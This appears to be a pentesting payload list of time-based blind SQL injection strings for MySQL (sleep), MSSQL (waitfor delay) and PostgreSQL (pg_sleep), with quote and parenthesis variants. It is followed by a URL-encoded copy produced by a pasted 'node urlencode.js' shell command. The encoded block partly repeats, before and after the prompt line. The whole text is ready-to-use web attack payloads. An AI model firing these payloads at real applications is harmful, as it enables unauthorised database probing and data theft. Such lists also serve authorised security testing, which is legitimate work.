sleep(4)#
1 or sleep(4)#
" or sleep(4)#
' or sleep(4)#
" or sleep(4)="
' or sleep(4)='
1) or sleep(4)#
") or sleep(4)="
') or sleep(4)='
1)) or sleep(4)#
")) or sleep(4)="
')) or sleep(4)='
;waitfor delay '0:0:4'--
);waitfor delay '0:0:4'--
';waitfor delay '0:0:4'--
";waitfor delay '0:0:4'--
');waitfor delay '0:0:4'--
");waitfor delay '0:0:4'--
));waitfor delay '0:0:4'--
'));waitfor delay '0:0:4'--
"));waitfor delay '0:0:4'--
pg_sleep(4)--
1 or pg_sleep(4)--
" or pg_sleep(4)--
' or pg_sleep(4)--
1) or pg_sleep(4)--
") or pg_sleep(4)--
') or pg_sleep(4)--
1)) or pg_sleep(4)--
")) or pg_sleep(4)--
')) or pg_sleep(4)--
AND (SELECT * FROM (SELECT(SLEEP(4)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(4)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(4)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(4)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(4)))nQIP)#
SLEEP(4)#
SLEEP(4)--
SLEEP(4)="
SLEEP(4)='
SLEEP(4)/*' or SLEEP(4) or '" or SLEEP(4) or "*/
sleep(4)%23
1%20or%20sleep(4)%23
%22%20or%20sleep(4)%23
'%20or%20sleep(4)%23
%22%20or%20sleep(4)%3D%22
'%20or%20sleep(4)%3D'
1)%20or%20sleep(4)%23
%22)%20or%20sleep(4)%3D%22
')%20or%20sleep(4)%3D'
1))%20or%20sleep(4)%23
%22))%20or%20sleep(4)%3D%22
'))%20or%20sleep(4)%3D'
%3Bwaitfor%20delay%20'0%3A0%3A4'--
VN-LW13551-M:payloads regod$ node urlencode.js 
sleep(4)%23
1%20or%20sleep(4)%23
%22%20or%20sleep(4)%23
'%20or%20sleep(4)%23
%22%20or%20sleep(4)%3D%22
'%20or%20sleep(4)%3D'
1)%20or%20sleep(4)%23
%22)%20or%20sleep(4)%3D%22
')%20or%20sleep(4)%3D'
1))%20or%20sleep(4)%23
%22))%20or%20sleep(4)%3D%22
'))%20or%20sleep(4)%3D'
%3Bwaitfor%20delay%20'0%3A0%3A4'--
)%3Bwaitfor%20delay%20'0%3A0%3A4'--
'%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22%3Bwaitfor%20delay%20'0%3A0%3A4'--
')%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22)%3Bwaitfor%20delay%20'0%3A0%3A4'--
))%3Bwaitfor%20delay%20'0%3A0%3A4'--
'))%3Bwaitfor%20delay%20'0%3A0%3A4'--
%22))%3Bwaitfor%20delay%20'0%3A0%3A4'--
pg_sleep(4)--
1%20or%20pg_sleep(4)--
%22%20or%20pg_sleep(4)--
'%20or%20pg_sleep(4)--
1)%20or%20pg_sleep(4)--
%22)%20or%20pg_sleep(4)--
')%20or%20pg_sleep(4)--
1))%20or%20pg_sleep(4)--
%22))%20or%20pg_sleep(4)--
'))%20or%20pg_sleep(4)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))bAKL)%20AND%20'vRxe'%3D'vRxe
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))YjoC)%20AND%20'%25'%3D'
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))nQIP)
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))nQIP)--
AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(4)))nQIP)%23
SLEEP(4)%23
SLEEP(4)--
SLEEP(4)%3D%22
SLEEP(4)%3D'
SLEEP(4)%2F*'%20or%20SLEEP(4)%20or%20'%22%20or%20SLEEP(4)%20or%20%22*%2F